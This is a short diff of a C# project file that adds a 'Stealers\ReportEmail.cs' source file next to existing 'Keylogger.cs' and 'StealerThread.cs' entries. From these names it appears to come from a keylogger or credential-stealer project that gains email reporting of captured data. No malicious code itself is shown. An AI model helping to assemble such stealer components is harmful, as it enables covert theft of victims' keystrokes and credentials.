--- a/sub/sub.csproj
+++ b/sub/sub.csproj
@@ -48,6 +48,7 @@
     <Compile Include="Properties\AssemblyInfo.cs" />
     <Compile Include="Settings.cs" />
     <Compile Include="Stealers\Keylogger.cs" />
+    <Compile Include="Stealers\ReportEmail.cs" />
     <Compile Include="StealerThread.cs" />
   </ItemGroup>
   <ItemGroup>
